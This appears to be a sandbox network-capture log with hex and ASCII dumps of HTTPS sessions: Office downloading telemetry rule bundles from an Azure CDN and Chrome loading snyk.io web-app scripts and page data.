                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:05 UTC738INData Raw: 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 3d 6e 65 77 20 53 65 74 28 5b 22 5c 75 30 30 32 46 22 2c 22 5c 75 30 30 32 46 34 30 34 22 2c 22 5c 75 30 30 32 46 5b 2e 2e 2e 73 6c 75 67 5d 22 2c 22 5c 75 30 30 32 46 61 70 70 73 65 63 6d 61 70 5c 75 30 30 32 46 73 68 61 72 65 22 2c 22 5c 75 30 30 32 46 61 72 74 69 63 6c 65 73 5c 75 30 30 32 46 5b 2e 2e 2e 73 6c 75 67 5d 22 2c 22 5c 75 30 30 32 46 62 6c 6f 67 5c 75 30 30 32 46 5b 73 6c 75 67 5d 22 2c 22 5c 75 30 30 32 46 63 61 73 65 2d 73 74 75 64 69 65 73 5c 75 30 30 32 46 5b 73 6c 75 67 5d 22 2c 22 5c 75 30 30 32 46 63 6f 64 65 2d 63 68 65 63 6b 65 72 22 2c 22 5c 75 30 30 32 46 63 6f 64 65 2d 63 68 65 63 6b 65 72 5c 75 30 30 32 46 5b 2e 2e 2e 73 6c 75 67 5d 22 2c 22 5c 75 30 30 32 46 65 76 65 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: self.__SSG_MANIFEST=new Set(["\u002F","\u002F404","\u002F[...slug]","\u002Fappsecmap\u002Fshare","\u002Farticles\u002F[...slug]","\u002Fblog\u002F[slug]","\u002Fcase-studies\u002F[slug]","\u002Fcode-checker","\u002Fcode-checker\u002F[...slug]","\u002Feven


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              53192.168.2.54977613.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:05 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:05 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:05 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                                                                                                                              Content-Length: 218853
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Cache-Control: public
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 23 Oct 2024 06:30:03 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DCF32C20D7262E"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 39f98116-901e-0015-0fb5-25b284000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194905Z-16849878b785f8wh85a0w3ennn000000083000000000k5wr
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:05 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                                              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                                                                                                                                                                                                                                                              Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                                                                                                                                                                                                                                                              Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                                                                                                                                                                                                              Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                                                                                                                                                                                                                                                              Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                              Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              54192.168.2.54977523.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:05 UTC375OUTGET /_next/static/chunks/9253-7607d51456dc87b7.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="9253-7607d51456dc87b7.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"cb1fbd4ea4275b0c84dd670691f52ca0"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/9253-7607d51456dc87b7.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::lrxl8-1729257060095-b7a3d832d12b
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:05 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 10517
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799345.1093a3d
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC10517INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 32 35 33 5d 2c 7b 32 34 38 38 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6c 2c 6e 29 7b 6e 2e 64 28 6c 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 6c 65 74 7b 75 72 6c 3a 6c 3d 22 2f 22 2c 6c 6f 63 61 6c 65 3a 6e 3d 22 22 2c 62 61 73 65 50 61 74 68 3a 69 3d 22 22 2c 73 6c 75 67 3a 64 3d 22 22 7d 3d 65 3b 72 65 74 75 72 6e 5b 6c 2c 22 65 6e 2d 55 53 22 3d 3d 3d 6e 3f 6e 75 6c 6c 3a 6e 2c 69 2c 64 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 2f 7c 5c 2f 24 2f 67 2c 22 22 29 5d 2e 66
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9253],{24881:function(e,l,n){n.d(l,{Z:function(){return i}});function i(e){let{url:l="/",locale:n="",basePath:i="",slug:d=""}=e;return[l,"en-US"===n?null:n,i,d.replace(/^\/|\/$/g,"")].f


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              55192.168.2.54978523.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC595OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"coaszi6dyw1itu"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::hn558-1729799346242-a5f118d63433
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:06 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799346.1f60b42
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC15773INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 32 70 65 73 6e 52 55 64 34 45 75 51 74 44 6f 44 31 57 67 4b 48 52 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 30 37 2d 31 39 54 31 38 3a 35 39 3a 30 38 2e 35 38 38 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 36 2d 32 34 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2pesnRUd4EuQtDoD1WgKHR","type":"Entry","createdAt":"2022-07-19T18:59:08.588Z","updatedAt":"2024-06-24T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:06 UTC16024INData Raw: 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 53 4d 78 56 69 73 64 37 75 54 69 57 52 32 7a 78 37 46 47 34 4d 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 34 54 31 35 3a 34 32 3a 35 38 2e 38 36 31 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 33 2d 32 35 54 31 34 3a 30 35 3a 34 39 2e 32 32 30 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69
                                                                                                                                                                                                                                                                                                              Data Ascii: ts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3SMxVisd7uTiWR2zx7FG4M","type":"Entry","createdAt":"2022-11-04T15:42:58.861Z","updatedAt":"2024-03-25T14:05:49.220Z","environment":{"sys":{"id":"master","type":"Li
